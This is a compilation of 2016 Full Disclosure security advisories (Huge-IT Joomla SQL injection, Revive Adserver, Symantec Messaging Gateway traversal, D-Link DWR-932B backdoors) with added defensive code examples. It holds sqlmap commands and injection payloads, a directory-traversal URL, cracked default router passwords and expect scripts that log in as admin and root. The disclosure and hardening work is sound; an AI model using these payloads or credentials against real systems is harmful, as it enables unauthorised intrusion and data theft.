[FD] Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
Title: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://huge-it.com/joomla-catalog/
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: i...@huge-it.com

Description:
Huge-IT Product Catalog is made for demonstration, sale, advertisements for your products. Imagine a stand with a variety of catalogs with a specific product category. To imagine is not difficult, to use is even easier.

Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL into functions via 'load_more_elements_into_catalog' located in ajax_url.php.

Vulnerable Code in: ajax_url.php

 11 define('_JEXEC', 1);
 12 defined('_JEXEC') or die('Restircted access');
 .
 .
 .
308 } elseif ($_POST["post"] == "load_more_elements_into_catalog") {
309     $catalog_id = $_POST["catalog_id"];
310     $old_count = $_POST["old_count"];
311     $count_into_page = $_POST["count_into_page"];
312     $show_thumbs = $_POST["show_thumbs"];
313     $show_description = $_POST["show_description"];
314     $show_linkbutton = $_POST["show_linkbutton"];
315     $parmalink = $_POST["parmalink"];
316     $level = $_POST['level'];
 .
 .
 .
359     $query->select('*');
360     $query->from('#__huge_it_catalog_products');
361     $query->where('catalog_id =' . $catalog_id);
362     $query->order('ordering asc');
363     $db->setQuery($query, $from, $count_into_page);

CVE-2016-1000125

Exploit Code:

$ sqlmap -u 'http://example.com/components/com_catalog/ajax_url.php' --data="prod_page=1&post=load_more_elements_into_catalog&catalog_id=*&old_count=*&count_into_page=*&show_thumbs=*&show_description=*&parmalink=*" --level=5 --risk=3

Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=

    Type: UNION query
    Title: Generic UNION query (random number) - 15 columns
    Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
---
[16:48:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[16:48:10] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 6637 times
[16:48:10] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'

[*] shutting down at 16:48:10

Advisory: http://www.vapidlabs.com/advisory.php?v=171

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-15
Download Site: http://huge-it.com/joomla-video-gallery/
Vendor: www.huge-it.com, fixed v1.1.0
Vendor Notified: 2016-09-17
Vendor Contact: i...@huge-it.com

Description:
A video slideshow gallery.

Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL into functions located in ajax_url.php.

Vulnerable Code in: ajax_url.php

 11 define('_JEXEC',1);
 12 defined('_JEXEC') or die('Restircted access');
 .
 .
 .
 28 if($_POST['task']=="load_videos_content"){
 29
 30     $page = 1;
 31
 32
 33     if(!empty($_POST["page"]) && is_numeric($_POST['page']) && $_POST['page']>0){
 34         $paramssld='';
 35         $db5 = JFactory::getDBO();
 36         $query5 = $db->getQuery(true);
 37         $query5->select('*');
 38         $query5->from('#__huge_it_videogallery_params');
 39         $db->setQuery($query5);
 40         $options_params = $db5->loadObjectList();
 41         foreach ($options_params as $rowpar) {
 42             $key = $rowpar->name;
 43             $value = $rowpar->value;
 44             $paramssld[$key] = $value;
 45         }
 46         $page = $_POST["page"];
 47         $num=$_POST['perpage'];
 48         $start = $page * $num - $num;
 49         $idofgallery=$_POST['galleryid'];
 50
 51         $query = $db->getQuery(true);
 52         $query->select('*');
 53         $query->from('#__huge_it_videogallery_videos');
 54         $query->where('videogallery_id ='.$idofgallery);
 55         $query ->order('#__huge_it_videogallery_videos.ordering asc');
 56         $db->setQuery($query,$start,$num);

CVE-2016-1000123

Exploit Code:

$ sqlmap -u 'http://example.com/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2" --level=5 --risk=3
.
.
.
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2
---
[19:36:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[19:36:55] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2714 times
[19:36:55] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'

[*] shutting down at 19:36:55

Advisory: http://www.vapidlabs.com/advisory.php?v=169
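Both Huge-IT advisories above show the same defect: a POST value (`catalog_id` in the catalog, `galleryid` in the video gallery) is concatenated straight into a WHERE clause. The following Python program is an added illustration, not code from either advisory or from Huge-IT, of why that is injectable and what the minimal fix looks like. It runs the concatenated query against an in-memory SQLite table standing in for the plugin's products table, then runs the hardened form beside it (an integer check on the parameter followed by a bound placeholder). The table, its rows and the function names are constructed for the demo; the tautology input is the first fragment of the error-based payload sqlmap reported.

```python
"""Added example: string-concatenated WHERE clause vs. validated, bound parameter.
Everything below (table, rows, names) is constructed for the demonstration."""
import sqlite3

# Constructed stand-in for #__huge_it_catalog_products: (id, catalog_id, name)
SAMPLE_ROWS = [
    (1, 1, "public product"),
    (2, 2, "other catalog product"),
    (3, 7, "unpublished product"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, catalog_id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def load_products_vulnerable(conn: sqlite3.Connection, catalog_id: str) -> list:
    """Mirrors the advisory's pattern: the raw POST value becomes part of the SQL
    text, so whoever sends the request also controls the query grammar."""
    sql = "SELECT name FROM products WHERE catalog_id = " + catalog_id + " ORDER BY id ASC"
    return [row[0] for row in conn.execute(sql)]


class BadRequest(ValueError):
    """Raised when a request parameter does not have its expected shape."""


def load_products_fixed(conn: sqlite3.Connection, catalog_id: str) -> list:
    """Hardened form: accept only a plain decimal integer, then bind it as a
    parameter so the database never parses it as SQL."""
    if not catalog_id.isdigit():
        raise BadRequest("catalog_id must be a decimal integer")
    sql = "SELECT name FROM products WHERE catalog_id = ? ORDER BY id ASC"
    return [row[0] for row in conn.execute(sql, (int(catalog_id),))]


def demo() -> dict:
    """Run both variants on an honest id and on the tautology fragment."""
    conn = make_db()
    honest = "1"
    tautology = "-2369 OR 1"  # leading fragment of sqlmap's error-based payload above
    results = {
        "vuln_honest": load_products_vulnerable(conn, honest),
        "vuln_tautology": load_products_vulnerable(conn, tautology),  # returns every row
        "fixed_honest": load_products_fixed(conn, honest),
    }
    try:
        load_products_fixed(conn, tautology)
        results["fixed_tautology"] = "accepted"
    except BadRequest:
        results["fixed_tautology"] = "rejected"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Note that the video gallery code already guards `page` with `is_numeric`, but neither `galleryid` (which reaches the WHERE clause) nor `perpage` (which reaches `setQuery`'s limit) gets the same check; in PHP the equivalent of the `isdigit` test above is casting with `(int)` before the value is ever concatenated.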
[FD] [REVIVE-SA-2016-002] Revive Adserver - Multiple vulnerabilities
Revive Adserver Security Advisory REVIVE-SA-2016-002
http://www.revive-adserver.com/security/revive-sa-2016-002

CVE-IDs: TBA
Date: 2016-09-28
Risk Level: Medium
Applications affected: Revive Adserver
Versions affected: <= 3.2.4
Versions not affected: >= 3.2.5, >= 4.0.0
Website: http://www.revive-adserver.com/

Vulnerability 1 - Reflected file download

CVE-ID: TBA
CWE-ID: CWE-79
CVSSv2: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H/E:F/RL:O/RC:C
CVSSv3 Base Score: 9.6
CVSSv3 Temporal Score: 8.9

Abdullah Hussam has reported via HackerOne that www/delivery/asyncspc.php was vulnerable to the fairly new Reflected File Download (RFD) web attack vector that enables attackers to gain complete control over a victim's machine by virtually downloading a file from a trusted domain.

References
==========
https://cwe.mitre.org/data/definitions/79.html
https://github.com/revive-adserver/revive-adserver/commit/69aacbd2

Vulnerability 2 - Special Element Injection

CVE-ID: TBA
CWE-ID: CWE-75
CVSSv2: 2.1 (AV:N/AC:H/Au:S/C:N/I:P/A:N)
CVSSv3 Vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:N/E:U/RL:O/RC:C
CVSSv3 Base Score: 3.1
CVSSv3 Temporal Score: 2.7

Joel Noguera has reported via HackerOne that usernames weren't properly sanitised when creating users on a Revive Adserver instance. In particular, control characters were not filtered, allowing apparently identical usernames to co-exist in the system, due to the fact that such characters are normally ignored when an HTML page is displayed in a browser. The issue could have therefore been exploited for user spoofing, although elevated privileges are required to create users within Revive Adserver.

References
==========
https://cwe.mitre.org/data/definitions/75.html
https://github.com/revive-adserver/revive-adserver/commit/05b1eceb

Vulnerability 3 - Reflected XSS

CVE-ID: TBA
CWE-ID: CWE-79
CVSSv2: 4 (AV:N/AC:H/Au:N/C:P/I:P/A:N)
CVSSv3 Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N/E:U/RL:O/RC:C
CVSSv3 Base Score: 4.2
CVSSv3 Temporal Score: 3.7

The HackerOne user pavanw3b has reported that the Revive Adserver web installer scripts were vulnerable to a reflected XSS attack via the dbHost, dbUser and possibly other parameters. It has to be noted that the window for such attack vectors to be possible is extremely narrow and it is very unlikely that such an attack could be actually effective.

References
==========
https://cwe.mitre.org/data/definitions/79.html
https://github.com/revive-adserver/revive-adserver/commit/14ff73f0
https://github.com/revive-adserver/revive-adserver/commit/fcf72c8a

Solution

We strongly advise people to upgrade to the most recent 4.0.0 or 3.2.5 releases of Revive Adserver, including those running OpenX Source or older versions of the application.

Contact Information

The security contact for Revive Adserver can be reached at: . Please review http://www.revive-adserver.com/security/ before doing so.

-- 
Matteo Beccati
On behalf of the Revive Adserver Team
http://www.revive-adserver.com/
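Vulnerability 2 above is a good illustration of a check that is easy to omit: two usernames that differ only by characters a browser never paints look like one account to an administrator reading the user list. The following Python snippet is an added example, not Revive Adserver's code, of the validation a user-creation handler can apply. It rejects names containing Unicode control (Cc) or format (Cf) characters outright, and it goes a step beyond the advisory's finding by also refusing names that collide with an existing one after stripping such characters, NFKC-normalising and case-folding. The sample names and the length limit are constructed for the demo.

```python
"""Added example: reject invisible characters in usernames and detect
look-alike collisions. Sample names below are constructed."""
import unicodedata

# Unicode categories that render invisibly in HTML: Cc = control, Cf = format
# (zero-width space, joiners, bidi overrides and similar).
_INVISIBLE_CATEGORIES = {"Cc", "Cf"}
MAX_USERNAME_LEN = 64  # assumed policy value, not from the advisory


def invisible_chars(name: str) -> list:
    """Return (offset, 'U+XXXX') for every control/format character in name."""
    return [
        (i, f"U+{ord(ch):04X}")
        for i, ch in enumerate(name)
        if unicodedata.category(ch) in _INVISIBLE_CATEGORIES
    ]


def canonical(name: str) -> str:
    """Form used for uniqueness checks: drop invisible characters, fold
    compatibility variants with NFKC, case-fold and trim whitespace."""
    visible = "".join(
        ch for ch in name if unicodedata.category(ch) not in _INVISIBLE_CATEGORIES
    )
    return unicodedata.normalize("NFKC", visible).casefold().strip()


def validate_new_username(name: str, existing: list) -> tuple:
    """Return (ok, reason). Invisible characters are rejected with their
    positions so the error is actionable; collisions are checked on the
    canonical form, not on the raw bytes."""
    bad = invisible_chars(name)
    if bad:
        detail = ", ".join(f"{offset}:{cp}" for offset, cp in bad)
        return False, "control/format characters at " + detail
    if not name.strip() or len(name) > MAX_USERNAME_LEN:
        return False, "empty or too long"
    taken = {canonical(e) for e in existing}
    if canonical(name) in taken:
        return False, "collides with an existing username"
    return True, "ok"


if __name__ == "__main__":
    current_users = ["admin"]  # constructed
    for candidate in ["admin", "ad\u200bmin", "ad\x00min", "Admin", "reports"]:
        print(repr(candidate), validate_new_username(candidate, current_users))
```

Rejecting rather than silently stripping is deliberate: a stripped name would be stored in a form the user never typed, and the error message with code-point positions tells an honest user (or an auditor reading logs) exactly what was wrong.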
[FD] Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Date : 28/09/2016
# Author : R-73eN
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
# Software : https://www.symantec.com/products/threat-protection/messaging-gateway
# Vendor : Symantec
# CVE : CVE-2016-5312
# Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00
#
#  ___        __        ____                _    _
# |_ _|_ __  / _| ___  / ___| ___ _ __    / \  | |
#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \  / _ \ | |
#  | || | | |  _| (_) | |_| |  __/ | | |/ ___ \| |___
# |___|_| |_|_|  \___/ \____|\___|_| |_/_/   \_\_____|
#
#
# DESCRIPTION:
#
# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests.
# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory.
# This could potentially provide read access to some files/directories on the server for which the user is not authorized.
#
# The problem lies in the package kavachart-kcServlet-5.3.2.jar, File: com/ve/kavachart/servlet/ChartStream.java

The vulnerable code is:

    extends HttpServlet {
        public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {
            block6 : {
                try {
                    String string = httpServletRequest.getParameter("sn"); // Taking parameter "sn" and writing it to the "string" variable
                    if (string == null) break block6;
                    String string2 = string.substring(string.length() - 3);
                    byte[] arrby = (byte[])this.getServletContext().getAttribute(string); // The string variable is passed here without any sanitization for directory traversal
                                                                                          // and you can successfully use this to do a directory traversal.
                    if (arrby != null) {
                        httpServletResponse.setContentType("image/" + string2);
                        ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();
                        httpServletResponse.setContentLength(arrby.length);
                        servletOutputStream.write(arrby);
                        this.getServletContext().removeAttribute(string);
                        break block6;
                    }

POC:
https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib
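The servlet above takes the `sn` value as-is, uses it as a lookup key and even derives the response content type from its last three characters. The following Python code is an added example, not Symantec's or KavaChart's code, of the allow-list check a handler in that position should perform before any lookup: accept only a bare file name built from a small character set with a known image extension, and look it up inside a dedicated namespace rather than the whole shared attribute store. The accepted extensions, the namespace prefix, the 64-character limit and the sample store are assumptions for the demo; the traversal string is the one from the POC above.

```python
"""Added example: allow-list validation of a chart-name request parameter.
Extensions, namespace prefix and sample data are assumptions for this demo."""
import posixpath
import re

# Assumed allow-list: the only chart images the endpoint is meant to serve,
# with the media type taken from a fixed table instead of the request value.
CONTENT_TYPES = {"png": "image/png", "gif": "image/gif", "jpg": "image/jpeg"}
_SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.(png|gif|jpg)")
NAMESPACE = "chart/"  # assumed prefix under which chart bytes are stored


def validate_chart_name(sn) -> tuple:
    """Return (accepted, content_type_or_reason) for a candidate 'sn' value.
    Each rejection reason is specific so it can be logged and alerted on."""
    if not sn:
        return False, "missing"
    if "\x00" in sn:
        return False, "embedded NUL"
    # Any separator or dot-segment path is refused before the pattern check,
    # so "../../WEB-INF/lib" never reaches a lookup.
    if "/" in sn or "\\" in sn or sn != posixpath.basename(sn):
        return False, "path components not allowed"
    if not _SAFE_NAME.fullmatch(sn):
        return False, "name does not match allow-list pattern"
    ext = sn.rsplit(".", 1)[1].lower()
    return True, CONTENT_TYPES[ext]


def fetch_chart(store: dict, sn) -> tuple:
    """Look a validated name up in its own namespace of the shared store.
    Returns (bytes_or_None, content_type_or_reason)."""
    ok, info = validate_chart_name(sn)
    if not ok:
        return None, info
    data = store.get(NAMESPACE + sn)
    if data is None:
        return None, "not found"
    return data, info


if __name__ == "__main__":
    sample_store = {NAMESPACE + "chart_42.png": b"\x89PNG..."}  # constructed
    for candidate in ["chart_42.png", "../../WEB-INF/lib", "..", "chart.exe", None]:
        print(repr(candidate), fetch_chart(sample_store, candidate))
```

The layered rejection (NUL, separators, pattern) is intentional: the pattern alone would reject the POC string too, but separate checks give distinct log messages, and a NUL or slash in a parameter that should only ever name an image is itself worth an alert.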
[FD] Multiple vulnerabilities found in the Dlink DWR-932B (backdoor, backdoor accounts, weak WPS, RCE ...)
Hello,

Please find a text-only version below sent to security mailing lists.

The complete version on analysing the security in Dlink 932B LTE routers is posted here:
https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html

=== text-version of the advisory without technical explanations ===

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

## Advisory Information

Title: Multiple vulnerabilities found in the Dlink DWR-932B (backdoor, backdoor accounts, weak WPS, RCE ...)
Advisory URL: https://pierrekim.github.io/advisories/2016-dlink-0x00.txt
Blog URL: https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html
Date published: 2016-09-28
Vendors contacted: Dlink
Release mode: Released
CVE: no current CVE
DWF: no current DWF

## Product Description

Dlink is a multinational networking equipment manufacturing corporation.

## Vulnerabilities Summary

The Dlink DWR-932B is an LTE router / access point, overall badly designed with a lot of vulnerabilities. It's available in a number of countries to provide Internet with an LTE network.

It's a model based on the (in)famous Quanta LTE router models and inherits some vulnerabilities.

The tests below are done using the latest available firmware (firmware DWR-932_fw_revB_2_02_eu_en_20150709.zip, model revision B, /Share3/DailyBuild/QDX_DailyBuild/QDT_2031_DLINK/QDT_2031_OS/source/LINUX/apps_proc/oe-core/build/tmp-eglibc/sysroots/x86_64-linux/usr/bin/armv7a-vfp-neon-oe-linux-gnueabi/arm-oe-linux-gnueabi-gcc).

The summary of the vulnerabilities is:

- Backdoor accounts
- Backdoor
- Default WPS PIN
- Weak WPS PIN Generation - with a reverse-engineered algorithm
- Leaking No-IP account (?)
- Multiple vulnerabilities in the HTTP daemon (qmiweb)
- Remote FOTA (Firmware Over The Air)
- Bad security practices
- Security removed in UPnP

A personal point of view: at best, the vulnerabilities are due to incompetence; at worst, it is a deliberate act of security sabotage from the vendor.

Not all the vulnerabilities found have been disclosed in this advisory. Only the significant ones are shown.

This router is still on sale.

Due to lack of security patches provided by the vendor, the vulnerabilities will remain unpatched and customers with questions should contact their local/regional D-Link support office for the latest information.

## Details

- Backdoor accounts

By default, telnetd and SSHd are running in the router.

Telnetd is running even if there is no documentation about it:

user@kali:~$ cat ./etc/init.d/start_appmgr
[...]
#Sandro { for telnetd debug...
start-stop-daemon -S -b -a /bin/logmaster
#if [ -e /config2/telnetd ]; then
start-stop-daemon -S -b -a /sbin/telnetd
#fi
#Sandro }
[...]

2 backdoor accounts exist and can be used to bypass the HTTP authentication used to manage the router.

admin@homerouter:~$ grep admin /etc/passwd
admin:htEcF9TWn./9Q:168:168:admin:/:/bin/sh
admin@homerouter:~$

The password for admin is 'admin' and can be found in the /bin/appmgr program using IDA:

About the root user:

user@kali:~$ cat ./etc/shadow
root:aRDiHrJ0OkehM:16270:0:9:7:::
daemon:*:16270:0:9:7:::
bin:*:16270:0:9:7:::
sys:*:16270:0:9:7:::
sync:*:16270:0:9:7:::
games:*:16270:0:9:7:::
man:*:16270:0:9:7:::
lp:*:16270:0:9:7:::
mail:*:16270:0:9:7:::
news:*:16270:0:9:7:::
uucp:*:16270:0:9:7:::
proxy:*:16270:0:9:7:::
www-data:*:16270:0:9:7:::
backup:*:16270:0:9:7:::
list:*:16270:0:9:7:::
irc:*:16270:0:9:7:::
gnats:*:16270:0:9:7:::
diag:*:16270:0:9:7:::
nobody:*:16270:0:9:7:::
messagebus:!:16270:0:9:7:::
avahi:!:16270:0:9:7:::
admin@kali:~$

Using john to crack the hashes:

user@kali:~$ john -show shadow+passwd
admin:admin:admin:/:/bin/sh
root:1234:16270:0:9:7:::

2 password hashes cracked, 0 left
user@kali:~$

Results:
- admin has password admin
- root has password 1234

Working exploit for admin:

user@kali:~$ cat quanta-ssh-default-password-admin
#!/usr/bin/expect -f

set timeout 3
spawn ssh admin@192.168.1.1
expect "password: $"
send "admin\r"
interact

user@kali:~$ ./quanta-ssh-default-password-admin
spawn ssh admin@192.168.1.1
admin@192.168.1.1's password:
admin@homerouter:~$ id
uid=168(admin) gid=168(admin) groups=168(admin)
admin@homerouter:~$

Alternatively, you can fetch it at https://pierrekim.github.io/advisories/quanta-ssh-default-password-admin.

Working exploit for root:

user@kali:~$ cat quanta-ssh-default-password-root
#!/usr/bin/expect -f

set timeout 3
spawn ssh root@192.168.1.1
expect "password: $"
send "1234\r"
interact

user@kali:~$ ./quanta-ssh-default-password-root
spawn ssh root@192.168.1.1
root@192.168.1.1's pa
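The two findings shown in the Details section (an undocumented telnetd launched from start_appmgr, and accounts whose crypt hashes and login shells allow interactive logins) are the kind of thing a firmware audit can flag mechanically once the filesystem is extracted. The following Python script is an added example, not part of Pierre Kim's advisory or tooling, that does exactly that over the /etc/passwd, /etc/shadow and start_appmgr excerpts quoted above, embedded as strings. The root and daemon passwd lines are constructed (the advisory only shows the admin line of passwd), and the shadow excerpt is trimmed to a few of the rows shown.

```python
"""Added example: audit extracted firmware files for password-login accounts
and for daemons started from init scripts. Inputs are excerpts from the
advisory above, plus constructed passwd rows for root and daemon."""
import re

PASSWD = """\
admin:htEcF9TWn./9Q:168:168:admin:/:/bin/sh
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
"""

SHADOW = """\
root:aRDiHrJ0OkehM:16270:0:9:7:::
daemon:*:16270:0:9:7:::
nobody:*:16270:0:9:7:::
messagebus:!:16270:0:9:7:::
"""

START_APPMGR = """\
#Sandro { for telnetd debug...
start-stop-daemon -S -b -a /bin/logmaster
#if [ -e /config2/telnetd ]; then
start-stop-daemon -S -b -a /sbin/telnetd
#fi
#Sandro }
"""

NOLOGIN_SHELLS = {"/bin/false", "/sbin/nologin", "/usr/sbin/nologin"}
# Assumed list of daemons that accept remote interactive logins.
REMOTE_LOGIN_DAEMONS = {"/sbin/telnetd", "/usr/sbin/telnetd", "/usr/sbin/sshd", "/usr/sbin/dropbear"}


def usable_hash(field: str) -> bool:
    """'*', '!' (and anything starting with '!') or an empty field mean the
    account cannot authenticate with a password; anything else is a real hash."""
    return field not in ("", "*") and not field.startswith("!")


def login_accounts(passwd: str, shadow: str) -> list:
    """Usernames with a usable password hash (inline in passwd, or in shadow
    when passwd holds 'x') and a shell that is not a no-login stub."""
    shadow_hash = {}
    for line in shadow.splitlines():
        parts = line.split(":")
        if len(parts) >= 2:
            shadow_hash[parts[0]] = parts[1]
    found = []
    for line in passwd.splitlines():
        parts = line.split(":")
        if len(parts) < 7:
            continue  # malformed row; a stricter audit would report it
        user, pw, shell = parts[0], parts[1], parts[6]
        h = shadow_hash.get(user, "") if pw == "x" else pw
        if usable_hash(h) and shell not in NOLOGIN_SHELLS:
            found.append(user)
    return found


def active_service_starts(script: str) -> list:
    """Programs launched by start-stop-daemon lines that are not commented out.
    The commented '#if [ -e /config2/telnetd ]' guard is exactly what makes the
    telnetd line unconditional."""
    started = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.search(r"start-stop-daemon\b.*?-a\s+(\S+)", line)
        if m:
            started.append(m.group(1))
    return started


def audit() -> dict:
    logins = login_accounts(PASSWD, SHADOW)
    services = active_service_starts(START_APPMGR)
    return {
        "password_login_accounts": logins,
        "started_daemons": services,
        "remote_login_daemons": [s for s in services if s in REMOTE_LOGIN_DAEMONS],
    }


if __name__ == "__main__":
    for key, value in audit().items():
        print(f"{key}: {value}")
```

On a real extracted image the same two functions run over the whole init directory and the real passwd/shadow pair; any account the first function returns is one whose hash deserves a dictionary run like the john session above, and any daemon the second returns that also appears in the remote-login set is a listening service the product documentation should account for.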
[FD] Edward Snowden won Glas of Reason - (Glas der Vernunft) Award 2016
Award 2016 "Glas of Reason" (Glas der Vernunft) for Edward Snowden (10.000€)
@snowden

- Security Press Articles
http://www.mirror.co.uk/news/world-news/german-city-gives-nsa-whistleblower-8913033
http://www.bild.de/wa/ll/bild-de/unangemeldet-42925516.bild.html
http://www.stern.de/panorama/kasseler-buergerpreis-geht-an-edward-snowden-7073662.html
http://www.zdnet.de/88272377/glas-der-vernunft-kasseler-buerger-ehren-edward-snowden/
http://www.zeit.de/news/2016-09/25/auszeichnungen-kasseler-buergerpreis-geht-an-edward-snowden-25061402
http://www.focus.de/regional/kassel/auszeichnungen-kasseler-buergerpreis-geht-an-edward-snowden_id_5984583.html
https://www.heise.de/newsticker/meldung/Edward-Snowden-mit-Kasseler-Buergerpreis-ausgezeichnet-3331286.html

- http://hessenschau.de/tv-sendung/video-21974.html
https://www.hna.de/kassel/glas-vernunft-kassel-verliehen-snowden-wurde-zugeschaltet-6782520.html
http://www.wetter.de/cms/edward-snowden-mit-kasseler-buergerpreis-das-glas-der-vernunft-ausgezeichnet-4012717.html
http://www.arcor.de/content/aktuell/regional_news/hessen/5238264,1,Auszeichnungen--Edward-Snowden-mit-Kasseler-B%C3%BCrgerpreis-ausgezeichnet,content.html
http://www.ffh.de/news-service/ffh-nachrichten/nController/News/nAction/show/nCategory/nordhessen/nId/77386/nItem/edward-snowden-bekommt-kasseler-buergerpreis.html
http://www.dw.com/de/whistleblower-edward-snowden-erh%C3%A4lt-kasseler-b%C3%BCrgerpreis/a-35886447
http://www.ad-hoc-news.de/kassel-der-whistleblower-edward-snowden-wird-heute-mit--/de/News/51270557
http://www.kassel-live.de/?s=edward+snowden&submit=Suche

- Note: The video recordings will be published transparently by an uncensored German source within the next days! Feel free to share and enjoy the unique statement.